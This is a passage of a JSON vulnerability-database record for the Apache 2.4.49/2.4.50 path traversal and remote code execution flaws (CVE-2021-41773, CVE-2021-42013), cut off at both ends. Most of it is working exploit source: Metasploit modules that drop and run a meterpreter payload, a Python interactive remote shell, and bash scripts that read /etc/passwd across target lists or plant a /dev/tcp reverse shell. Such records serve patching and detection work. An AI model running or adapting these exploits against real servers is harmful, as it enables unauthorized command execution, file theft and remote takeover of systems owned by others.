Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']} (requires mod_cgi to be enabled).\"))\n\n return Exploit::CheckCode::Safe\n when 'READ_FILE'\n fail_with(Failure::BadConfig, 'File path option is empty!') if !datastore['FILEPATH'] || datastore['FILEPATH'].empty?\n\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << datastore['FILEPATH']\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n if response.code == 500\n print_warning(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n end\n\n if response.code == 500 || response.body.empty?\n print_error('Nothing was downloaded')\n\n return Exploit::CheckCode::Vulnerable if response.code == 500\n end\n\n if response.code == 200\n vprint_good(\"#{peer} \\n#{response.body}\")\n path = store_loot(\n 'apache.traversal',\n 'application/octet-stream',\n ip,\n response.body,\n datastore['FILEPATH']\n )\n print_good(\"File saved in: #{path}\")\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_normalize_path.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T10:41:58", "description": "This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). 
If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T11:22:47", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-10T13:01:15", "id": "MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/apache_normalize_path_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n 
update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 
'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? 
Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apache_normalize_path_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-10-25T17:32:29", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164629", "href": "https://packetstormsecurity.com/files/164629/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = 
ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE', \n'Description' => %q{ \nThis module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). \nIf files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, \nit can be used to execute arbitrary commands (Remote Command Execution). \nThis vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013). \n}, \n'References' => [ \n['CVE', '2021-41773'], \n['CVE', '2021-42013'], \n['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'], \n['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'], \n['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'], \n['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis'] \n], \n'Author' => [ \n'Ash Daulton', # Vulnerability discovery \n'Dhiraj Mishra', # Metasploit auxiliary module \n'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise) \n], \n'DisclosureDate' => '2021-05-10', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path', \n'Action' => 'CHECK_RCE', \n'RPORT' => 443, \n'SSL' => true \n}, \n'Targets' => [ \n[ \n'Automatic (Dropper)', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 
\n'DisablePayloadHandler' => 'false' \n} \n} \n], \n[ \n'Unix Command (In-Memory)', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]), \nOptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]), \nOptString.new('TARGETURI', [true, 'Base path', '/cgi-bin']) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef execute_command(command, _opts = {}) \ntraversal = pick_payload * datastore['DEPTH'] << '/bin/sh' \n \nuri = normalize_uri(datastore['TARGETURI'], traversal.to_s) \nresponse = send_request_raw({ \n'method' => Rex::Text.rand_text_alpha(3..4), \n'uri' => uri, \n'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\" \n}) \nif response && response.body \nreturn response.body \nend \n \nfalse \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef pick_payload \ncase datastore['CVE'] \nwhen 'CVE-2021-41773' \npayload = '.%2e/' \nwhen 'CVE-2021-42013' \npayload = '.%%32%65/' \nelse \npayload = '' \nend \n \npayload \nend \n \ndef exploit \n@proto = (ssl ? 'https' : 'http') \n \nif (!check.eql? 
Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \n \nprint_status(message(\"Attempt to exploit for #{datastore['CVE']}\")) \ncase target['Type'] \nwhen :linux_dropper \n \nfile_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\" \ncmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\" \n \nprint_status(message(\"Sending #{datastore['PAYLOAD']} command payload\")) \nvprint_status(message(\"Generated command payload: #{cmd}\")) \n \nexecute_command(cmd) \n \nregister_file_for_cleanup file_name \nwhen :unix_command \nvprint_status(message(\"Generated payload: #{payload.encoded}\")) \n \nif !cmd_unix_generic? \nexecute_command(payload.encoded) \nelse \nreceived = execute_command(payload.encoded.to_s) \n \nprint_warning(message('Dumping command output in response')) \nif !received \nprint_error(message('Empty response, no command output')) \n \nreturn \nend \nprint_line(received) \nend \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164629/apache_normalize_path_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-11T17:16:30", "description": "", "cvss3": {}, "published": "2021-11-11T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "PACKETSTORM:164941", "href": "https://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) \n# Date: 11/11/2021 \n# Exploit Author: Valentin Lobstein \n# Vendor Homepage: https://apache.org/ \n# Software Link: https://github.com/Balgogan/CVE-2021-41773 \n# Version: Apache 
2.4.49/2.4.50 (CGI enabled) \n# Tested on: Debian GNU/Linux \n# CVE : CVE-2021-41773 / CVE-2021-42013 \n# Credits : Lucas Schnell \n \n \n#!/usr/bin/env python3 \n#coding: utf-8 \n \nimport os \nimport re \nimport sys \nimport time \nimport requests \nfrom colorama import Fore,Style \n \n \nheader = '''\\033[1;91m \n \n\u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n\u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n\u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n\u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 
\u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \n\u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591 \n\u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591 \n\u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL \n \n \nif len(sys.argv) < 2 : \nprint( 'Use: python3 file.py ip:port ' ) \nsys.exit() \n \ndef end(): \nprint(\"\\t\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \ndef commands(url,command,session): \ndirectory = mute_command(url,'pwd') \nuser = mute_command(url,'whoami') \nhostname = mute_command(url,'hostname') \nadvise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)') \ncommand = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \ncommand = f\"echo; {command};\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nprint(output) \nif 'clear' in command: \nos.system('/usr/bin/clear') \nprint(header) \nif 'exit' in command: \nend() \n \ndef mute_command(url,command): \nsession = requests.Session() \nreq = requests.Request('POST', url=url, data=f\"echo; {command}\") \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \nreturn response.text.strip() \n \n \ndef exploitRCE(payload): \ns = requests.Session() \ntry: \nhost = sys.argv[1] \nif 'http' 
not in host: \nurl = 'http://'+ host + payload \nelse: \nurl = host + payload \nsession = requests.Session() \ncommand = \"echo; id\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nif \"uid\" in output: \nchoice = \"Y\" \nprint( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host) \nprint(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output ) \nchoice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \") \nif choice.lower() in ['','y','yes']: \nwhile True: \ncommands(url,command,session) \nelse: \nend() \nelse : \nprint(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host) \nexcept KeyboardInterrupt: \nend() \n \ndef main(): \ntry: \napache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' \napache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' \npayloads = [apache2449_payload,apache2450_payload] \nchoice = len(payloads) + 1 \nprint(header) \nprint(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\") \nwhile choice >= len(payloads) and choice >= 0: \nchoice = int(input('[~] Choice : ')) \nif choice < len(payloads): \nexploitRCE(payloads[choice]) \nexcept KeyboardInterrupt: \nprint(\"\\n\\033[1;91m[!] 
Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164941/apachehttp2450-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-13T15:48:46", "description": "", "cvss3": {}, "published": "2021-10-13T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Path Traversal / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "PACKETSTORM:164501", "href": "https://packetstormsecurity.com/files/164501/Apache-HTTP-Server-2.4.50-Path-Traversal-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.50 \n# Tested on: 2.4.50 \n# CVE : CVE-2021-42013 \n# Credits: Ash Daulton and the cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 == '' ]]; [[ $2 == '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] [COMMAND] \necho ./PoC.sh targets.txt /etc/passwd \necho ./PoC.sh targets.txt /bin/sh id \n \nexit \nfi \nfor host in $(cat $1); do \necho $host \ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done \n \n# PoC.sh targets.txt /etc/passwd \n# PoC.sh targets.txt /bin/sh whoami \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164501/apache2450-traversalexec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-25T17:32:30", "description": "", "cvss3": {}, "published": "2021-10-24T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": 
"2021-10-24T00:00:00", "id": "PACKETSTORM:164609", "href": "https://packetstormsecurity.com/files/164609/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) \n# Credits: Ash Daulton & cPanel Security Team \n# Date: 24/07/2021 \n# Exploit Author: TheLastVvV.com \n# Vendor Homepage: https://apache.org/ \n# Version: Apache 2.4.50 with CGI enable \n# Tested on : Debian 5.10.28 \n# CVE : CVE-2021-42013 \n \n#!/bin/bash \n \necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' \nif [ $# -eq 0 ] \nthen \necho \"try: ./$0 http://ip:port LHOST LPORT\" \nexit 1 \nfi \ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\" \n \n#usage chmod -x CVE-2021-42013.sh \n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164609/apache2450-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-06T17:18:36", "description": "", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.49 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "PACKETSTORM:164418", "href": "https://packetstormsecurity.com/files/164418/Apache-HTTP-Server-2.4.49-Path-Traversal.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.49 \n# Tested on: 2.4.49 \n# CVE : CVE-2021-41773 \n# Credits: Ash Daulton and the 
cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 == '' ]]; [[ $2 == '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] \necho ./PoC.sh targets.txt /etc/passwd \nexit \nfi \nfor host in $(cat $1); do \ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164418/apache2449-traversal.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2021-12-23T13:19:11", "description": "This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands. This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-26T00:00:00", "type": "zdt", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-10-26T00:00:00", "id": "1337DAY-ID-36952", "href": "https://0day.today/exploit/description/36952", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => 